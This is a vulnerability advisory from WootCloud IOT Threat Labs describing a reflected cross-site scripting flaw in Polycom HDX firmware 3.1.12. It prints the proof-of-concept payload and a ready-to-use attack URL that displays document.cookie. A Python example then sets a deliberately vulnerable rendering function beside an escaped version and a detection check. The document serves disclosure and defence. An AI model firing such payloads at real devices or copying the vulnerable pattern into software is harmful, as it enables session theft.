Overview
Researched By: WootCloud IOT Threat Labs (WITL)
Tested Firmware: Polycom HDX Systems 3.1.12 Firmware
(https://support.polycom.com/content/dam/polycom-support/products/telepresence-and-video/hdx-series/release-notes/en/3725-2398a-079a-hdx3.1.12-rel-notes.pdf)
Vulnerable Systems: Polycom HDX 4000 to 9000 systems running firmware 3.1.12 or earlier.
Issue: Cross-site Scripting (XSS) Vulnerability in the "Remote Access Settings" Component
Details: The HTTP parameter "message" (passed as "FAILED&message=") of the "remoteaccesssettings.htm" page is prone to a reflected XSS vulnerability. The page fails to validate the arbitrary input passed by the user and executes the JavaScript payload in the context of the user's browser. The following payload was used to confirm the vulnerability.
- Payload: ';--"/>"/><h1><iframe src="JavaScript:alert(/Injected_via_Iframe/)"></iframe><br/><br/><a href="JavaScript:alert(document.cookie);">[INJECTED PAYLOAD]</a></h1>
- URL: https://[polycom_hdx_system]/a_remoteaccesssettings.htm?FAILED&message=';--"/>"/><h1><iframe src="JavaScript:alert(/Injected_via_Iframe/)"></iframe><br/><br/><a href="JavaScript:alert(document.cookie);">[INJECTED PAYLOAD]</a></h1>
XSS vulnerabilities can be used to execute malicious code or steal session details via injected JavaScript. Successful execution of the payload is shown below:


For more details about this class of issue, refer to: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Recommendation: All user-supplied input should be sanitized, filtered and validated on the server side before it is reflected into the page.
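As an added illustration of the recommendation (example code written for this page, not Polycom's firmware code), the snippet below contrasts the flawed pattern of copying the "message" parameter verbatim into the response with a hardened version that HTML-entity-encodes it, using the advisory's own payload as constructed input; the hostname hdx.example, the error-line markup and the function names are assumptions.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed sample: the advisory's payload as it arrives after URL decoding.
PAYLOAD = ("';--\"/>\"/><h1><iframe src=\"JavaScript:alert(/Injected_via_Iframe/)\"></iframe>"
           "<br/><br/><a href=\"JavaScript:alert(document.cookie);\">[INJECTED PAYLOAD]</a></h1>")

# Constructed request URL (hostname is an assumption); the payload is percent-encoded
# the way a browser would send it in the query string.
SAMPLE_URL = "https://hdx.example/a_remoteaccesssettings.htm?FAILED&message=" + quote(PAYLOAD)


def message_from_url(url: str) -> str:
    """Return the decoded 'message' query parameter (empty string if absent)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("message", [""])[0]


def render_vulnerable(message: str) -> str:
    """Flawed pattern: the untrusted value is copied verbatim into the HTML, so a
    value containing tags or script is parsed and executed by the browser."""
    return '<p class="error">Remote access login failed: ' + message + "</p>"


def render_hardened(message: str) -> str:
    """Hardened pattern: every HTML metacharacter (< > & " ') is entity-encoded,
    so the browser renders the value as literal text inside the <p> element."""
    return '<p class="error">Remote access login failed: ' + html.escape(message, quote=True) + "</p>"


def looks_like_injection(message: str) -> bool:
    """Coarse detection check for web-server logs: flag 'message' values carrying
    tag delimiters or a javascript: URL, which a legitimate status text never has."""
    lowered = message.lower()
    return any(marker in lowered for marker in ("<", ">", "javascript:"))


if __name__ == "__main__":
    value = message_from_url(SAMPLE_URL)
    print("vulnerable:", render_vulnerable(value))
    print("hardened:  ", render_hardened(value))
    print("flagged:   ", looks_like_injection(value))
```

html.escape is the right encoding only for the HTML body and quoted-attribute contexts; a value echoed inside a script block would need JavaScript-string encoding instead.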